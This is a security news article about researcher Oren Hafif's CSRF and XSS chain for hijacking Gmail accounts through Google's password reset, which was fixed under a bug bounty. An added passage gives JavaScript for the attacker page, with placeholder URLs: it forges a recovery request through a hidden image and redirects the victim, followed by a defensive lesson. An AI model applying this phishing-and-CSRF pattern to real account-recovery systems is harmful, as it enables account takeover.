Hacking Google Gmail accounts exploiting password reset system flaw


9:30 ET, 25 November 2013

Security researcher Oren Hafif demonstrated how to hijack a Google Gmail account by exploiting a serious flaw in the password reset process.

A serious vulnerability in the password reset process for Google accounts allowed an attacker to hijack any account. This is the striking discovery made by security researcher Oren Hafif.

“That password recovery is often in the center of attention for attackers – and for security professionals,” reported Oren.

Oren demonstrated the feasibility of a fairly ordinary spear-phishing attack that relies on a chain of flaws, including cross-site request forgery (CSRF) and cross-site scripting (XSS). The attacker sends the targeted account a fake “Confirm account ownership” email that claims to come from Google.

Following the usual phishing pattern, the link embedded in the fake e-mail asks the recipient to confirm ownership of the account and to change the password.

The link in the email appears to point to an HTTPS google.com URL, but it actually leads the victim to a website controlled by the attacker, which then performs a CSRF with the customized email address.

“The link should actually refer to an attacker’s site (and it does): http://www.orenh.com/test.html#Email=hatechnion@gmail.com. The attacker’s site performs a CSRF with the customized email address, and once completed – launches the XSS exploit. The code might look like this:” said Oren.

[Image: the attacker page’s code, as shown in Oren Hafif’s post]

“The code above reads a Hash parameter (“Email”) for the victim’s email. It creates an invisible image and puts an “initialize password recovery” link as its source. After the request is processed, an Error event is thrown (since this is not really an image).”

The Google HTTPS page then asks the victim to confirm ownership by entering their last password, and then prompts them to reset it.


At this point the attacker has captured the victim’s new password and session cookies through the XSS.

“The onError handler now redirects to the XSS’d URL. The user clicks “Reset Password”… and from here the sky is the limit.”
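The attacker-page logic that the two quotes above describe (read the address from the URL fragment, fire the recovery request through an invisible image, use the image’s error event as the “done” signal and redirect), reconstructed here as an added JavaScript example. This is not code from Oren Hafif’s post. The recovery-initiation URL and the landing URL are hypothetical placeholders, since the real Google endpoints are not given on this page; the function takes `document` and a navigation callback as parameters so the logic can be exercised outside a browser.

```javascript
// Added example (not Oren Hafif's code): the attacker-page pattern described above.
// Both URLs below are hypothetical placeholders (assumption); the real endpoints
// involved in the 2013 report are not given on this page.
const RECOVERY_INIT_URL = 'https://accounts.example.com/recovery/start';
const LANDING_URL = 'https://accounts.example.com/recovery/confirm?next=PLACEHOLDER';

// Step 1: read the victim's address from the fragment, e.g.
//   http://www.orenh.com/test.html#Email=hatechnion@gmail.com
// The fragment is never sent to the server, so the attacker's web logs
// (and any URL filter) only ever see the bare page URL.
function emailFromHash(hash) {
  const params = new URLSearchParams(hash.replace(/^#/, ''));
  const email = params.get('Email');
  // keep only something shaped like a mailbox; anything else aborts
  if (!email || !/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email)) return null;
  return email;
}

// Step 2: build the state-changing GET that starts recovery for that address.
// A GET that changes server-side state and carries no CSRF token is exactly
// what makes the request forgeable from a third-party page.
function recoveryUrl(email) {
  return RECOVERY_INIT_URL + '?email=' + encodeURIComponent(email);
}

// Step 3: issue the request via an invisible <img>. The response is not an
// image, so the browser fires "error" once it has been processed; the onerror
// handler is used as a "request completed" signal that moves the victim on.
function launchRecoveryCsrf(doc, navigate, hash) {
  const email = emailFromHash(hash);
  if (email === null) return false;
  const img = doc.createElement('img');
  img.style.display = 'none';
  img.onerror = () => navigate(LANDING_URL);
  img.src = recoveryUrl(email);
  doc.body.appendChild(img);
  return true;
}

// Browser usage (not exercised by the test below):
// launchRecoveryCsrf(document, (url) => { location.href = url; }, location.hash);
```

The defensive lesson is in step 2: any request that changes account state (including “start a password recovery”) must carry a secret anti-CSRF token tied to the session and should be a POST, and session cookies should be marked SameSite, so a cross-origin `<img>` load cannot trigger it.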


The researcher published a proof of concept video to demonstrate the attack:

http://www.youtube.com/watch?feature=player_embedded&v=zJFuSPywWM8

Hafif reported the flaw to Google’s security team. Google promptly fixed the issues and awarded him $5,100 under its bug bounty program.

Pierluigi Paganini    

(Security Affairs – Google mail, hacking)